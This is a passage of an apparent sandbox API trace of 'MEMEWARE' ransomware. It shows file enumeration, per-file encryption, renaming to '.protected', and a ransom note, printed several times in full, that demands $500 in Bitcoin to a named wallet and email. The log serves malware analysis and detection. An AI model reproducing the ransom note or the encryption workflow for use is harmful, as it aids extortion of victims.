lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.993] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.993] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.994] CloseHandle (hObject=0x164) returned 1 [0078.994] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.994] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0078.994] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0078.994] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0078.994] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0078.994] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0078.994] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi") returned 141 [0078.994] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0078.994] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0078.994] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\*") returned 143 [0078.994] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.994] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.994] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.994] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.994] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.994] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.994] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\.") returned 143 [0078.994] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.994] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.994] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.994] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.994] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.994] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.994] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.994] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\..") returned 144 [0078.994] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.994] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.994] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.994] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0078.994] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.994] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.995] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.995] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.995] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.995] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.995] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.995] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.995] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.996] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.996] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.996] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.996] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.996] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.996] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.996] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x117, lpOverlapped=0x0) returned 1 [0078.997] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.997] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x117, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x117, lpOverlapped=0x0) returned 1 [0078.997] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.997] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.997] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.997] CloseHandle (hObject=0x168) returned 1 [0078.997] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.protected") returned 165 [0078.997] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.protected")) returned 1 [0078.998] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.998] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.998] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\RESTORE_FILES.txt") returned 159 [0078.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0078.998] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.998] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.999] lstrlenA (lpString="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") returned 684 [0078.999] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.999] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.999] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.999] CloseHandle (hObject=0x164) returned 1 [0078.999] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.999] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0078.999] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0078.999] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0078.999] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0078.999] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0078.999] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu") returned 141 [0078.999] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0078.999] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0078.999] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\*") returned 143 [0078.999] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0079.000] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.000] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.000] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.000] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.000] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.000] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\.") returned 143 [0079.000] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.000] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.000] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.000] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.000] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.000] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.000] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.000] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\..") returned 144 [0079.000] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.000] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.000] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.000] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.000] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.000] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.000] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.000] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.000] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0079.000] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.000] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.000] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.000] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0079.001] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0079.001] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0079.001] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.001] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xeb, lpOverlapped=0x0) returned 1 [0079.001] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.001] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xeb, lpOverlapped=0x0) returned 1 [0079.002] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.002] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.002] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.002] CloseHandle (hObject=0x168) returned 1 [0079.002] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.protected") returned 165 [0079.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.protected")) returned 1 [0079.002] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.002] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.002] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\RESTORE_FILES.txt") returned 159 [0079.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.003] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.003] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.003] lstrlenA (lpString="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") returned 684 [0079.003] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0079.003] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.003] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.004] CloseHandle (hObject=0x164) returned 1 [0079.004] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.004] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0079.004] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0079.004] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0079.004] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0079.004] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0079.004] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id") returned 141 [0079.004] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0079.004] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0079.004] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\*") returned 143 [0079.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.004] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.004] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.004] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.004] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.004] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.004] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\id\\.") returned 143 [0079.004] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.004] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.004] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.004] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.004] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") 